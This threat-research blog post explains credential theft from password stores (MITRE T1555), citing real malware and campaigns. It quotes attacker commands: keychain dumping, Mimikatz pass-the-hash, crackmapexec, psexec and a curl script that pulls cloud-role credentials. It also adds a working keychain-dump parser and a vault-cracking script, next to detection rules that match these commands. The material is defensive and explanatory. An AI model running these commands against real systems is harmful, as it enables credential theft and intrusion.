Passwords are the keys to the kingdom in any environment and modern security best practices tell us to use more complex passwords. While these practices aimed to improve security, they also made passwords harder to remember, leading many users to store them in password managers and browser credential stores for convenience. Password stores often contain plaintext or encrypted credentials that, if compromised, can provide attackers with unauthorized access to critical systems.
In this blog post, we explain the T1555 Credentials from Password Stores technique of the MITRE ATT&CK® framework and explore how adversaries exploit password stores with real-world attack examples in detail.
The Red Report 2025
Adversary Use of Credentials from Password Stores
Adversaries use the Credentials from Password Stores technique to harvest credentials held in password stores such as password managers, browser credential stores, operating system keychains, and cloud secrets managers, enabling them to expand their access within a target environment. Since these stores often contain account credentials for enterprise systems, cloud services, and critical applications, they are particularly attractive targets. A compromised password store can hand adversaries privileged credentials, making it easier to maintain persistence, move laterally across the network, and reach valuable data.
This technique often requires attackers to gain access to the device or application hosting the password store. The initial access can be achieved via Phishing (T1566) or Exploiting Public Facing Applications (T1190). Once inside, attackers leverage various tactics, including abusing administrative privileges or exploiting weaknesses in the password store's design, to decrypt or directly extract the stored credentials. For example, password managers and browser-based storage often rely on encryption to secure stored data, but if the adversary can access the master key or exploit a design flaw, the encrypted sensitive data becomes exposed.
With the stored credentials in hand, adversaries can access sensitive data or impersonate legitimate users, and where the store also yields session cookies or tokens they can sidestep multi-factor authentication (MFA) altogether. Credentials extracted from password stores frequently include details for privileged or service accounts, which are particularly valuable for widening an attack's scope or achieving full domain compromise.
- Privilege Escalation
By extracting credentials stored in password repositories, attackers may gain access to accounts with higher privileges than their initial foothold, enabling them to execute actions or access systems that would otherwise be restricted. For instance, many users and applications store administrator or service account credentials in password managers, browser-based storage, or operating system keychains. If an adversary compromises a machine or application and extracts these stored credentials, they could use them to log into accounts with elevated privileges, such as domain administrators, system administrators, or privileged cloud service accounts. This access allows the attacker to bypass privilege constraints on their initial account, significantly increasing their control over the environment.
- Lateral Movement
Lateral movement involves an attacker expanding their access across systems and networks after gaining an initial foothold. Extracting credentials from password stores is a particularly effective method for this purpose, as it often provides the attacker with legitimate authentication data for other accounts, systems, or applications. For example, credentials for remote desktop connections, VPNs, or privileged accounts might be stored in these repositories. By using these credentials, attackers can authenticate to other systems within the network as legitimate users, bypassing many security mechanisms that might block unauthorized access.
Additionally, the credentials extracted may belong to users with access to critical or interconnected systems, such as file shares, email servers, or administrative consoles. By leveraging these credentials, adversaries can pivot through the network, establishing persistence and identifying additional targets for exploitation.
- Defense Evasion
With extracted credentials, adversaries can impersonate legitimate users to access systems, applications, or resources. Because the activity originates from a valid account, it often looks normal to security monitoring, reducing the likelihood of alerts. Logging in with the rightful user's password satisfies authentication-based controls, and if the extracted material also includes session cookies or tokens, it can sidestep multi-factor authentication (MFA) entirely, since the session has already been authenticated.
Moreover, adversaries can use credentials to avoid detection tools that monitor unauthorized execution or privilege escalation attempts. Instead of deploying malware or using exploit-based methods, which may trigger antivirus or endpoint detection systems, attackers with extracted credentials can perform their tasks directly through authorized accounts and approved tools. This strategy minimizes their reliance on potentially detectable malicious tools or techniques.
- Persistence
By extracting stored credentials, adversaries can gain access to accounts that enable them to re-enter the target environment at will. These credentials might belong to privileged users, service accounts, or cloud-based applications, providing attackers with multiple avenues for maintaining access. For instance, if an attacker retrieves the credentials of an administrator or a system account, they can use these to log back into the environment remotely, create backdoor accounts, or modify configurations to secure their foothold.
Moreover, the use of legitimate credentials for persistence is particularly advantageous for adversaries because it allows them to blend their activity with normal user behavior. Unlike malware-based persistence methods, which rely on implanting additional code or creating suspicious registry entries, using credentials appears less anomalous to security monitoring tools. This makes detection more challenging and allows attackers to operate covertly.
Sub-techniques of Credentials from Password Stores
- T1555.001 Keychain
Keychain is a built-in password management system for macOS and iOS that securely stores users' sensitive information, such as usernames, passwords, encryption keys, certificates, and secure notes. Its purpose is to provide a convenient and secure way for users and applications to manage authentication data.
Keychain is designed to streamline the user experience by autofilling credentials across various applications and websites, ensuring that authentication processes are both seamless and secure. It employs robust encryption mechanisms to protect stored data, making it accessible only to authorized users and applications.
Despite its robust design, Keychain is not entirely immune to vulnerabilities. Misconfigurations, exploitable flaws in the system, or adversaries gaining unauthorized access to the user's device can potentially compromise the sensitive information stored within it.
Adversaries target the Keychain because it often contains credentials for both local and remote systems, such as email accounts, VPNs, and websites. Root access alone does not expose the login keychain's contents: the keychain is encrypted with the user's login password, so attackers need that password (captured, phished, or reused), an already unlocked keychain together with the user's consent to per-item access prompts, or a flaw in the access-control checks. Once they have that, they can use legitimate or malicious tools to extract and decrypt the stored credentials.
A particularly stealthy aspect of targeting the Keychain is its integration with macOS and iOS as a legitimate system tool. Since Keychain operations are native to the operating system, unauthorized data extraction might not trigger immediate alerts from security monitoring systems. Attackers can exploit this design to blend their actions with legitimate user or system activity, making detection challenging for defenders.
For example, adversaries may use macOS's built-in security command-line tool, which lets authorized users query Keychain data: security find-generic-password -w prints a single item's secret, and security dump-keychain -d writes every item, including its secret data, to standard output. Because the tool is native, attackers can extract credentials programmatically without dropping malware that antivirus or endpoint detection might flag. Custom scripts or malicious applications can automate these queries to harvest many credentials at once, provided they satisfy the per-item access control prompts or supply the Keychain password.
In April 2024, the Cuckoo infostealer was reported to collect files from the victim's Keychain directory. The decompiled snippet below, taken from Kandji's analysis, shows it building the ~/Library/Keychains path and enumerating the directory's contents (skipping .DS_Store) before collection [1].

```
_snprintf(&_~/Library/Keychains, 0x200, "%s/%s/%s")
osascriptCreateforApple()
void* var_4b0 = &var_458
int64_t* var_4a8_2 = &Keychains
_snprintf(&_~/Library/Keychains, 0x200, "%s/%s")
int64_t* var_498 = &Keychains
void* var_490 = &_~/Library/Keychains
openDir_readDir(DirectoryOpen: &_~/Library/Keychains, "*", avoid_DS_Store, &var_498, 0x3e7)
```
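The scripted harvesting described above, as an added example that is not part of the original post or of any of the malware it cites: a small parser for the text that security dump-keychain -d emits, plus a wrapper that runs the real tool. The sample dump embedded below is constructed to match the tool's output format; it is not a real keychain. The attribute names (acct, svce, srvr) and the keychain path are the real ones; everything else is illustrative.

```python
"""Parse the output of `security dump-keychain -d` into (class, account, service, secret) records."""
import os
import re
import subprocess
from dataclasses import dataclass
from typing import Optional

# Attributes that identify an item: acct = account, svce = service (generic items),
# srvr = server (internet items). Values are either "..." or <NULL>.
ATTR_RE = re.compile(r'^\s+"(acct|svce|srvr)"<blob>=(?:"(.*)"|<NULL>)\s*$')


@dataclass
class KeychainItem:
    item_class: str         # "genp" (generic password) or "inet" (internet password)
    account: str
    service: str            # svce for genp items, srvr for inet items
    secret: Optional[str]   # None when the dump was run without -d or access was denied


def parse_dump(text: str) -> list[KeychainItem]:
    """Each record starts with a 'keychain:' line; with -d it ends with a 'data:' line
    followed by the secret on the next line (quoted when printable)."""
    items: list[KeychainItem] = []
    cur: Optional[dict] = None
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i]
        if line.startswith("keychain:"):
            if cur is not None:
                items.append(KeychainItem(**cur))
            cur = {"item_class": "", "account": "", "service": "", "secret": None}
        elif cur is not None:
            if line.startswith("class:"):
                cur["item_class"] = line.split(":", 1)[1].strip().strip('"')
            elif (m := ATTR_RE.match(line)):
                value = m.group(2) or ""
                if m.group(1) == "acct":
                    cur["account"] = value
                else:
                    cur["service"] = value
            elif line.startswith("data:") and i + 1 < len(lines):
                i += 1
                raw = lines[i].strip()
                cur["secret"] = raw[1:-1] if raw.startswith('"') and raw.endswith('"') else raw
        i += 1
    if cur is not None:
        items.append(KeychainItem(**cur))
    return items


def dump_login_keychain(path: str = "~/Library/Keychains/login.keychain-db") -> list[KeychainItem]:
    """Run the real tool. Every item whose ACL does not trust `security` raises an Allow/Deny
    prompt, which is why attackers prefer an unlocked keychain or offline decryption of a copied file."""
    out = subprocess.run(["security", "dump-keychain", "-d", os.path.expanduser(path)],
                         capture_output=True, text=True, check=True).stdout
    return parse_dump(out)


# Constructed sample in the tool's output format (not a real dump).
SAMPLE_DUMP = r'''keychain: "/Users/alice/Library/Keychains/login.keychain-db"
version: 512
class: "genp"
attributes:
    0x00000007 <blob>="GitHub"
    0x00000008 <blob>=<NULL>
    "acct"<blob>="alice"
    "cdat"<timedate>=0x32303234303130313030303030305A00  "20240101000000Z\000"
    "svce"<blob>="GitHub"
data:
"hunter2"
keychain: "/Users/alice/Library/Keychains/login.keychain-db"
version: 512
class: "inet"
attributes:
    "acct"<blob>="alice"
    "ptcl"<uint32>="htps"
    "srvr"<blob>="vpn.example.com"
data:
"Winter2024!"
'''

if __name__ == "__main__":
    for item in parse_dump(SAMPLE_DUMP):
        print(f"{item.item_class} {item.service!r} {item.account!r} -> {item.secret!r}")
```

From a defender's view the interesting signal is the other direction: a non-interactive process spawning security with dump-keychain or find-generic-password -w, or a burst of keychain access prompts, is worth an alert.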
- T1555.002 Securityd Memory
Securityd memory is the portion of system memory allocated to the securityd process, a core component of macOS responsible for managing sensitive security operations. This process is central to handling Keychain interactions, enforcing access controls, and performing cryptographic tasks. As part of its operations, securityd temporarily stores data in memory to facilitate tasks such as verifying credentials, retrieving Keychain entries, or executing encryption and decryption processes.
The data stored in securityd memory often includes highly sensitive information, such as plaintext passwords, private keys, authentication tokens, and other cryptographic materials. While this data is typically encrypted when stored in the Keychain, it must be decrypted and held in memory to perform operations. This decrypted state makes securityd memory a prime target for attackers seeking to harvest credentials or cryptographic keys.
Adversaries target securityd memory to extract sensitive credentials and cryptographic materials. Securityd memory temporarily holds plaintext versions of sensitive credentials, such as usernames, passwords, private keys, and authentication tokens, while performing tasks like user authentication or cryptographic operations. By exploiting securityd memory, attackers can bypass the typical security protections surrounding Keychain data, such as encryption and access controls, and directly access sensitive information in its decrypted state.
Because securityd runs as root, reading its memory requires root privileges, and with System Integrity Protection enabled, current macOS versions block debuggers and memory-dump tools from attaching to Apple system processes, so on a hardened machine this approach also requires SIP to be disabled. Where it is possible, attackers capture the process's memory with a dumping tool such as gcore and then search the dump for credential material or the decrypted keychain master key.
The extracted credentials and cryptographic materials can be used for various malicious activities, such as escalating privileges, authenticating to secure systems, performing lateral movement within a network, or exfiltrating sensitive data. Because the credentials are retrieved in plaintext, they are immediately usable by the attacker, significantly enhancing the speed and effectiveness of the attack.
- T1555.003 Credentials from Web Browsers
Many modern web browsers offer built-in password managers to improve usability and streamline the login process for users. When users log into a website, the browser can offer to save their username and password for future use. When a user opts to save a password, the browser encrypts the credentials using a mechanism tied to the user's system credentials or a master key.
Internally, browsers use secure storage mechanisms for saved credentials. Chrome, for instance, keeps logins in a SQLite database (Login Data) in the user's profile directory; the database itself is readable, but each password value is encrypted with a key that the operating system protects (DPAPI on Windows, the login Keychain on macOS, the session keyring on Linux), so the values cannot be decrypted without access to the user's OS-level key material. Firefox stores encrypted logins in logins.json and the corresponding key in key4.db; if the user has set a primary (master) password, that password protects the key, but without one the key is protected only by an empty password, so anyone who can read both files can decrypt the logins.
When a user revisits a website where credentials are saved, the browser retrieves and decrypts the relevant username and password, automatically populating the login fields. This process happens seamlessly in the background, with the decryption step requiring the user to be authenticated to their device or browser profile.
Adversaries extract saved usernames and passwords from web browsers, exploiting their credential storage mechanisms. The extracted credentials may provide a direct pathway to both personal and enterprise accounts, making them an appealing target for adversaries.
This technique typically requires an initial foothold on the target system. Once on the system, attackers go after the files, databases, or APIs behind the browser's password storage. Google Chrome and Microsoft Edge, for instance, keep credentials in a SQLite database in the user's profile directory, and the key that encrypts the password values is itself protected by the operating system's secure storage mechanism, such as the Windows Data Protection API (DPAPI) or the macOS Keychain. Because DPAPI decrypts in the context of the logged-on user, malware running as that user can unwrap the key and decrypt the database without elevated privileges; administrative rights only become necessary to attack other users' profiles offline with their DPAPI master keys. Similarly, Mozilla Firefox stores credentials in logins.json encrypted with a key kept locally in key4.db, and attackers who retrieve both files can decrypt the passwords.
In February 2024, CISA reported that the Chinese state-sponsored group Volt Typhoon targets Google Chrome and Microsoft Edge for stored credentials and browser history [2]. The actors look for the files listed below and collect the Local State file, which holds the DPAPI-protected AES key used to encrypt the passwords in Login Data.

```
AppData\local\Google\Chrome\UserData\default\History
AppData\Local\Google\Chrome\User Data\Local State
AppData\Local\Google\Chrome\User Data\Default\Login Data
AppData\Local\Microsoft\Edge\User Data
```
- T1555.004 Windows Credential Manager
Windows Credential Manager is a built-in feature in Microsoft Windows that allows users to securely store and manage credentials, such as usernames, passwords, and authentication tokens. It is designed to streamline the user experience by automatically saving and retrieving credentials for websites, network shares, and other resources, eliminating the need for users to remember multiple passwords. This functionality is integrated into the Windows operating system and is accessible through the Control Panel or settings.
The credential manager acts as a secure repository for sensitive data. When a user logs into a website or connects to a network resource, Windows offers to save the login credentials. These credentials are then encrypted and stored locally on the system. Windows uses its Data Protection API (DPAPI) to encrypt this information, tying the encryption keys to the user's account. This ensures that only the authenticated user can access the stored credentials, providing a layer of security against unauthorized access.
There are two primary categories in Windows Credential Manager: Web Credentials and Windows Credentials. Web Credentials hold logins for websites and web-based applications, while Windows Credentials hold authentication data for network shares, mapped drives, remote desktop connections, and enterprise applications. The latter category also covers certificate-based and generic credentials, which custom applications can use.
Adversaries target the Windows Credential Manager to extract sensitive authentication data. While Credential Manager is designed to enhance usability and security, it has become a target for attackers seeking to harvest stored credentials for unauthorized access and further malicious activities.
Similar to other credential access techniques, adversaries typically begin by gaining access to the target system, whether through phishing, malware delivery, vulnerability exploitation, or another initial access vector. Once on the system, they either operate in the context of the user whose credentials they want or escalate to administrative rights. Code running as the user can already enumerate and decrypt that user's own Credential Manager entries, because DPAPI unwraps them for the logged-on user; elevated privileges are needed to reach other users' vaults or to pull the material out of LSASS memory. With the required context, adversaries extract credentials using various methods and tools.
One common approach is to use legitimate Windows commands or PowerShell scripts to interact with Credential Manager. For example, attackers can use cmdkey to list stored credential targets (cmdkey /list shows target and user names, not passwords) or to add and delete entries. In December 2024, DarkGate malware was reported to use cmdkey.exe to view, extract, and delete saved credentials stored in Windows Credential Manager [3].

```
cmdkey /delete
cmdkey /list > C:\temp\cred.txt
```
Another prevalent tool is Mimikatz, a post-exploitation framework capable of dumping plaintext credentials from memory or extracting encrypted credentials from storage; its vault::cred and dpapi::cred modules target Credential Manager blobs directly, while the sekurlsa module reads LSASS memory (ATT&CK T1003.001). In August 2024, the SLOW#TEMPEST campaign was reported to use Mimikatz for dumping NTLM hashes [4]. Adversaries can crack these hashes offline to obtain cleartext credentials or use them as-is in Pass-the-Hash attacks for lateral movement. In this example, the actors used the extracted NTLM hashes for Pass-the-Hash with Mimikatz, crackmapexec, and Impacket's psexec.py.

```
sekurlsa::pth /user:[REDACTED] /domain:[REDACTED] /ntlm:[REDACTED] "/run:mstsc.exe /restrictedadmin"
crackmapexec smb ip.txt -u [REDACTED_DOMAIN]/Administrator -H [REDACTED_HASH]
python3 psexec.py [REDACTED_USER]@[REDACTED_IP] -hashes [REDACTED_HASH] -codec gbk
```
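The detection side of the browser and Credential Manager activity described in the last two sub-techniques, as an added example that is not part of the original post: a few hunt rules run over constructed endpoint telemetry. The events below are made up for this example (they mimic an EDR file-access event and a Sysmon event ID 1 / Windows 4688 process creation); the field names are hypothetical. The rules key on the two facts the text establishes: decrypting Chromium passwords needs both Local State and Login Data, and cmdkey /list, vault::cred, dpapi::cred and sekurlsa:: are the command-line tells.

```python
"""Hunt rules for browser and Credential Manager credential theft over constructed endpoint telemetry."""
import re
from collections import defaultdict

BROWSERS = {"chrome.exe", "msedge.exe"}
# Both files are needed to recover Chromium passwords on Windows.
CRED_FILES = {"login data", "local state"}
# Command lines that enumerate or decrypt stored credentials.
CMD_PATTERNS = [
    (re.compile(r"\bcmdkey(\.exe)?\b.*\s/list\b", re.I), "cmdkey /list: Credential Manager enumeration", "medium"),
    (re.compile(r"\bvault::cred\b|\bdpapi::cred\b", re.I), "Mimikatz Credential Manager module", "high"),
    (re.compile(r"\bsekurlsa::", re.I), "Mimikatz LSASS dump / pass-the-hash", "high"),
]

# Constructed telemetry, not real logs. Hypothetical schema: type, host, image, pid, path/cmdline.
EVENTS = [
    {"host": "WS01", "type": "process", "image": "chrome.exe", "pid": 4120, "cmdline": "chrome.exe"},
    {"host": "WS01", "type": "file_read", "image": "chrome.exe", "pid": 4120,
     "path": r"C:\Users\a\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"host": "WS01", "type": "file_read", "image": "updater.exe", "pid": 5522,
     "path": r"C:\Users\a\AppData\Local\Google\Chrome\User Data\Local State"},
    {"host": "WS01", "type": "file_read", "image": "updater.exe", "pid": 5522,
     "path": r"C:\Users\a\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"host": "WS02", "type": "process", "image": "cmd.exe", "pid": 801,
     "cmdline": r"cmd.exe /c cmdkey /list > C:\temp\cred.txt"},
    {"host": "WS03", "type": "process", "image": "mimikatz.exe", "pid": 77,
     "cmdline": 'mimikatz.exe "sekurlsa::pth /user:adm /domain:corp /ntlm:[REDACTED]"'},
]


def hunt(events: list[dict]) -> list[dict]:
    findings = []
    # (host, pid, image) -> credential files read by a process that is not the browser
    touched = defaultdict(set)
    for e in events:
        if e["type"] == "file_read":
            name = e["path"].rsplit("\\", 1)[-1].lower()
            if name in CRED_FILES and e["image"].lower() not in BROWSERS:
                touched[(e["host"], e["pid"], e["image"])].add(name)
        elif e["type"] == "process":
            for pattern, desc, severity in CMD_PATTERNS:
                if pattern.search(e["cmdline"]):
                    findings.append({"host": e["host"], "image": e["image"], "desc": desc, "severity": severity})
    for (host, pid, image), files in touched.items():
        # Reading both files is what decryption requires; one file alone is lower confidence.
        severity = "high" if files == CRED_FILES else "low"
        findings.append({"host": host, "image": image,
                         "desc": f"non-browser process read {sorted(files)}", "severity": severity})
    return findings


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f"[{f['severity']:>6}] {f['host']} {f['image']}: {f['desc']}")
```

Tune the browser allowlist per fleet (backup agents and some password managers legitimately read Login Data) and keep the "both files" correlation: it is what separates a credential-theft tool from an indexer that happened to touch one file.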
- T1555.005 Password Managers
Password managers are software applications designed to securely store, generate, and manage passwords for a user's online accounts and services. Their primary purpose is to help individuals and organizations maintain strong, unique passwords for every account without the burden of memorizing them all.
In an age where digital security is paramount, password managers play a critical role in protecting against cyber threats like password breaches, credential stuffing, and account takeovers.
A password manager functions as a centralized vault that stores encrypted passwords and other sensitive information, such as security questions, payment card details, and secure notes. The stored data is accessible through a single master password or, in some cases, biometric authentication, such as a fingerprint or facial recognition. This master password serves as the key to decrypt the stored information, making it essential to create and protect a strong, unique master password.
Password managers have become high-value targets for attackers because they often contain a wealth of sensitive credentials that can provide access to numerous accounts and systems. Adversaries aim to compromise password managers to extract valid credentials that can be used to access sensitive data, elevate privileges, and compromise other systems in the victim's environment.
The security of a password manager depends on its encryption mechanism and the strength of its master password. Adversaries may attempt to extract the encrypted vault file or database associated with the password manager. If they successfully obtain this file, they can try offline attacks, such as brute force or dictionary attacks, to crack the master password and decrypt the stored data. Tools like Hashcat can be used for such operations, especially if the master password is weak or commonly used.
In some cases, attackers leverage malware or keyloggers to capture the master password when the user enters it. This is a direct method of bypassing encryption without the need for extensive computational efforts.
In August 2024, ACR Stealer was reported to target password managers such as 1Password, RoboForm, Bitwarden, and NordPass [5].
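The offline attack on an extracted vault described above, as an added example that is not part of the original post and is not the format of any real password manager: a hypothetical vault header whose master key is derived with PBKDF2-HMAC-SHA256 and carries a key-check value, the same kind of oracle real clients use to reject a wrong master password quickly. A dictionary attack only needs that header; with a real product the equivalent step is a hashcat mode fed with the vault's KDF parameters. The wordlist is constructed.

```python
"""Offline dictionary attack on an extracted vault whose key is derived with PBKDF2-HMAC-SHA256."""
import hashlib
import hmac
import os
import time
from typing import Iterable, Optional

KEY_LEN = 32
CHECK_LABEL = b"vault-key-check"   # hypothetical domain-separation label for the key check


def derive_key(master_password: str, salt: bytes, iterations: int) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", master_password.encode("utf-8"), salt, iterations, KEY_LEN)


def create_vault(master_password: str, iterations: int) -> dict:
    """Hypothetical vault header. Salt and iteration count must be stored in clear so the legitimate
    client can re-derive the key; key_check lets it reject a wrong password without decrypting the
    payload, and hands an attacker who copies the file the very same test, offline and unthrottled."""
    salt = os.urandom(16)
    key = derive_key(master_password, salt, iterations)
    key_check = hmac.new(key, CHECK_LABEL, "sha256").digest()[:16]
    return {"salt": salt, "iterations": iterations, "key_check": key_check}


def check_password(vault: dict, candidate: str) -> bool:
    key = derive_key(candidate, vault["salt"], vault["iterations"])
    return hmac.compare_digest(hmac.new(key, CHECK_LABEL, "sha256").digest()[:16], vault["key_check"])


def crack(vault: dict, wordlist: Iterable[str]) -> tuple[Optional[str], int]:
    """Return (recovered master password or None, number of guesses made)."""
    tries = 0
    for candidate in wordlist:
        tries += 1
        if check_password(vault, candidate):
            return candidate, tries
    return None, tries


def guesses_per_second(iterations: int, samples: int = 20) -> float:
    """Rough single-core cost of one guess at this iteration count; GPU crackers are far faster,
    which is why the defence is an unguessable master password, not the KDF alone."""
    salt = b"\x00" * 16
    start = time.perf_counter()
    for i in range(samples):
        derive_key(f"guess{i}", salt, iterations)
    return samples / (time.perf_counter() - start)


# Constructed wordlist; a real attack uses leaked-password lists plus mangling rules.
WORDLIST = ["password", "123456", "qwerty", "Summer2024", "Winter2024!", "letmein"]

if __name__ == "__main__":
    weak = create_vault("Winter2024!", 600_000)
    print("weak master password:", crack(weak, WORDLIST))
    strong = create_vault("correct horse battery staple 7!", 600_000)
    print("strong master password:", crack(strong, WORDLIST))
    for it in (1_000, 100_000, 600_000):
        print(f"{it:>8} iterations: ~{guesses_per_second(it):.0f} guesses/s on one core")
```

Two things the run makes concrete: the iteration count only scales the attacker's cost linearly, while each extra word of entropy in the master password multiplies it, and a keylogger that captures the master password (the shortcut the text mentions) skips the whole computation.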
- T1555.006 Cloud Secrets Management Stores
Cloud Secrets Management Stores are specialized services provided by cloud platforms or third-party vendors to securely manage, store, and access sensitive information such as API keys, encryption keys, passwords, certificates, and other credentials. These secrets are critical for enabling secure communication between applications, services, and infrastructure in modern, cloud-centric environments.
Secrets management stores reduce risks of exposing sensitive information by replacing hardcoded secrets with a centralized, secure repository. They encrypt and control access to secrets, ensuring only authorized users or applications can retrieve them. Services like AWS Secrets Manager, Azure Key Vault, and Google Cloud Secret Manager offer features such as fine-grained access control, auditing, versioning, and automated secret rotation.
Adversaries exploit cloud-based secrets management systems post-compromise to access sensitive data or escalate privileges. They target misconfigurations, such as overly permissive access controls, often caused by developers assigning broad permissions. Using legitimate tools like AWS CLI, Azure PowerShell, or gcloud, attackers query APIs with stolen credentials to retrieve secrets, blending in with normal activity unless closely monitored.
Adversaries also exploit exposed credentials or tokens found in source code repositories, logs, or configuration files. Developers may unintentionally embed access tokens or API keys in code, which attackers can harvest if leaked, and malware or keyloggers may capture credentials directly from endpoints. In the SCARLETEEL operation, adversaries running inside a compromised workload queried the EC2 Instance Metadata Service (IMDS) to retrieve the credentials of the node's IAM role with the script given below [6]. Note that the script first requests a session token with a PUT to /latest/api/token, which is the IMDSv2 flow: enforcing IMDSv2 alone does not stop an attacker who already executes code on the instance, so the metadata hop limit and a least-privilege node role are what bound the damage.

```shell
TOKEN=`curl -X PUT "http://<target_IP>/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
ANAME=`curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://<target_IP>/latest/meta-data/iam/security-credentials/`
curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://<target_IP>/latest/meta-data/iam/security-credentials/$ANAME >> /tmp/...b
```
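Stolen instance-role credentials are used from wherever the attacker is, and CloudTrail records the source address of every call, which is the detection opportunity. The following is an added example that is not part of the original post or of the Sysdig analysis: it flags API calls made with EC2 instance-profile credentials (their STS session name is the instance ID) from an address outside the egress the fleet normally uses. The CloudTrail records and the egress range are constructed for this example; the field names are the real CloudTrail ones.

```python
"""Flag EC2 instance-role credentials used from outside known egress (constructed CloudTrail records)."""
import ipaddress
import re
from typing import Optional

# STS session names of instance-profile credentials are the instance ID.
INSTANCE_SESSION = re.compile(r"^i-[0-9a-f]{8,17}$")
# Egress the instances normally use (for example NAT gateway EIPs). Hypothetical range.
KNOWN_EGRESS = [ipaddress.ip_network("198.51.100.0/28")]
# Calls that typically follow credential theft: who am I, and what secrets can I read.
POST_THEFT_CALLS = {"GetCallerIdentity", "ListSecrets", "GetSecretValue", "ListBuckets", "GetSessionToken"}

INSTANCE_ROLE = {"type": "AssumedRole",
                 "arn": "arn:aws:sts::123456789012:assumed-role/NodeInstanceRole/i-0abc12345def67890"}
# Constructed records (trimmed to the fields used here).
RECORDS = [
    {"eventSource": "ec2.amazonaws.com", "eventName": "DescribeInstances",
     "sourceIPAddress": "198.51.100.3", "userIdentity": INSTANCE_ROLE},
    {"eventSource": "sts.amazonaws.com", "eventName": "GetCallerIdentity",
     "sourceIPAddress": "203.0.113.7", "userIdentity": INSTANCE_ROLE},
    {"eventSource": "secretsmanager.amazonaws.com", "eventName": "GetSecretValue",
     "sourceIPAddress": "203.0.113.7", "userIdentity": INSTANCE_ROLE},
    {"eventSource": "s3.amazonaws.com", "eventName": "ListBuckets", "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/deploy"}},
    {"eventSource": "ec2.amazonaws.com", "eventName": "DescribeVolumes",
     "sourceIPAddress": "203.0.113.7", "userIdentity": INSTANCE_ROLE},
]


def instance_session(record: dict) -> Optional[str]:
    """Return the instance ID when the caller is an assumed instance role, else None."""
    ident = record.get("userIdentity", {})
    if ident.get("type") != "AssumedRole":
        return None
    session = ident.get("arn", "").rsplit("/", 1)[-1]
    return session if INSTANCE_SESSION.match(session) else None


def from_known_egress(source_ip: str) -> bool:
    """Service-originated calls carry values like 'AWS Internal' or a service DNS name, not an IP."""
    try:
        ip = ipaddress.ip_address(source_ip)
    except ValueError:
        return True
    return any(ip in net for net in KNOWN_EGRESS)


def detect(records: list[dict]) -> list[dict]:
    findings = []
    for r in records:
        instance = instance_session(r)
        if instance is None or from_known_egress(r["sourceIPAddress"]):
            continue
        severity = "high" if r["eventName"] in POST_THEFT_CALLS else "medium"
        findings.append({"instance": instance, "ip": r["sourceIPAddress"],
                         "event": f'{r["eventSource"]}:{r["eventName"]}', "severity": severity})
    return findings


if __name__ == "__main__":
    for f in detect(RECORDS):
        print(f"[{f['severity']:>6}] {f['instance']} credentials used from {f['ip']}: {f['event']}")
```

This is the logic behind the GuardDuty finding for instance credential exfiltration, reduced to an allowlist you maintain yourself; in production, feed it the account's real NAT and VPC endpoint addresses and treat any Secrets Manager read from an unexpected address as an incident rather than an alert.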
References
[1] A. Kohler and C. Lopez, "Malware: Cuckoo Behaves Like Cross Between Infostealer and Spyware," Kandji. Available: https://www.kandji.io/blog/malware-cuckoo-infostealer-spyware
[2] CISA, "PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure," Cybersecurity Advisory AA24-038A, Feb. 2024. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a
[3] T. McGraw, "Black Basta Ransomware Campaign Drops Zbot, DarkGate, & Custom Malware," Rapid7, Dec. 2024. Available: https://www.rapid7.com/blog/post/2024/12/04/black-basta-ransomware-campaign-drops-zbot-darkgate-and-custom-malware/
[4] "From Cobalt Strike to Mimikatz: A Deep Dive into the SLOW#TEMPEST Campaign Targeting Chinese Users," Securonix, Aug. 29, 2024. Available: https://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/
[5] C. Lin, "Exploiting CVE-2024-21412: A Stealer Campaign Unleashed," Fortinet Blog. Available: https://www.fortinet.com/blog/threat-research/exploiting-cve-2024-21412-stealer-campaign-unleashed
[6] A. Brucato, "SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto," Sysdig. Available: https://sysdig.com/blog/scarleteel-2-0/